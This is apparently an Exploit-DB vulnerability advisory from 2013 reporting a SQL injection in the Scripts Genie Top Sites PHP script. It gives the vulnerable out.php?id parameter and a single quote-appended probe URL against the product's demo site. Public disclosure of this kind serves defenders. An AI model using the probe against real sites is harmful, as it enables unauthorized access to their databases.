Scripts Genie Top Sites - 'out.php?id' SQL Injection

EDB-ID:

24512

CVE:



Author:

3spi0n

Type:

webapps


Platform:

PHP

Date:

2013-02-17


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ \_________ _
 __  / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
\____/\__,_/_/ /_/_/____/____/\__,_/_/  /_/\___/____(_)____/_/   \__, /  
                                                                /____/   
##################################################################################																
Top Sites Script, SQL Injection Vulnerabilities
Software Page: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=top_site_script
Product Page: http://www.hotscripts.com/listing/top-sites-2-2-1/
Script Demo: http://scriptsgenie.com/demo/toplist.2.11/toplist/index.php

Author(Pentester): 3spi0n
On Social: Twitter.Com/eyyamgudeer
Greetz: Grayhats Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site (/out.php?id=)

>>> http://server/toplist/out.php?id=20' (MySQLi Found)